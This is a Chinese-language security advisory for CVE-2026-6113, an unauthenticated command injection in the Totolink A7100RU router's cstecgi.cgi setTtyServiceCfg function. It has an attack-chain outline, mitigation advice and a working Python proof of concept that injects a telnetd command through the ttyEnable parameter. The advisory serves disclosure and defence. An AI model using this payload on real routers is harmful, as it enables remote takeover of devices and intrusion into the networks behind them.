CVE-2026-6113 Totolink A7100RU OS命令注入漏洞

漏洞信息

漏洞编号

CVE-2026-6113

漏洞类型

OS命令注入

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Totolink A7100RU

漏洞概述

Totolink A7100RU路由器在7.4cu.2313_b20191024版本中存在严重的安全漏洞。该漏洞源于/cgi-bin/cstecgi.cgi文件中的setTtyServiceCfg函数未对用户输入的ttyEnable参数进行有效过滤，导致操作系统命令注入。攻击者无需身份认证即可通过网络远程发起攻击，利用此漏洞可在目标系统上执行任意命令。该漏洞对系统的机密性、完整性和可用性均造成严重影响，且目前已公开相关利用代码，风险极高。

技术细节

该漏洞位于Totolink A7100RU路由器的Web管理接口CGI脚本中。具体而言，当组件CGI Handler处理setTtyServiceCfg功能请求时，程序直接将用户可控的参数ttyEnable传递给后台系统命令执行函数，未经过任何安全过滤或转义。根据CVSS 3.1评分向量（AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H），该漏洞利用难度低，无需用户交互和权限即可通过网络远程触发。攻击者只需构造包含恶意Shell命令的HTTP POST请求发送至/cgi-bin/cstecgi.cgi接口，即可欺骗服务器执行任意系统指令（如反弹Shell、修改配置等）。由于该设备通常直接暴露在互联网或网络边缘，一旦被利用，攻击者可获得设备Root权限，进而接管整个网络流量或作为跳板攻击内网，危害极大。鉴于目前已有公开的PoC代码，建议管理员立即排查资产。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描网络，识别暴露在互联网上的Totolink A7100RU设备，并确认其运行在受影响的固件版本7.4cu.2313_b20191024上。

STEP 2

2. 漏洞利用

攻击者向目标设备的/cgi-bin/cstecgi.cgi接口发送特制的HTTP POST请求，在'ttyEnable'参数中注入恶意的Shell命令（如反弹Shell或开启Telnet）。

STEP 3

3. 命令执行

由于后端未过滤参数，设备系统直接执行了注入的命令。攻击者成功获取设备的Root权限或控制权。

STEP 4

4. 建立控制

攻击者利用获得的权限维持访问，窃取敏感数据，修改路由配置，或将设备作为跳板进一步攻击内网。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (example)
target_url = "http://<TARGET_IP>/cgi-bin/cstecgi.cgi"

# Headers
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
    "Content-Type": "application/json",
    "Accept": "application/json, text/javascript, */*; q=0.01"
}

# Payload data
# The vulnerability is in the 'ttyEnable' parameter within the 'setTtyServiceCfg' function.
# We append a semicolon (;) to separate commands and inject a malicious command (e.g., telnetd).
payload_data = {
    "topicurl": "setTtyServiceCfg",
    "ttyEnable": "1; telnetd -p 2323 &"  # Example command to start telnet on port 2323
}

try:
    # Send POST request
    response = requests.post(target_url, json=payload_data, headers=headers, timeout=5)
    
    # Check response
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Response:", response.text)
        print("[+] Check if the telnet service started on port 2323.")
    else:
        print(f"[-] Failed to send request. Status code: {response.status_code}")
        
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

Totolink A7100RU 7.4cu.2313_b20191024

防御指南

临时缓解措施

如果官方尚未提供修复补丁，建议立即将设备的管理界面（Web UI/CGI端口）从互联网断开，或在防火墙上阻断外部对设备80/443端口的访问。同时，可以通过监控网络流量中针对/cgi-bin/cstecgi.cgi的异常POST请求来及时发现攻击企图。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-6113
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-6113
3 Details https://www.cvedetails.com/cve/CVE-2026-6113/
4 VulDB https://vuldb.com/cve/CVE-2026-6113
5 Link https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_178/README.md
6 Link https://vuldb.com/submit/792246
7 Link https://vuldb.com/vuln/356973
8 Link https://vuldb.com/vuln/356973/cti
9 Link https://www.totolink.net/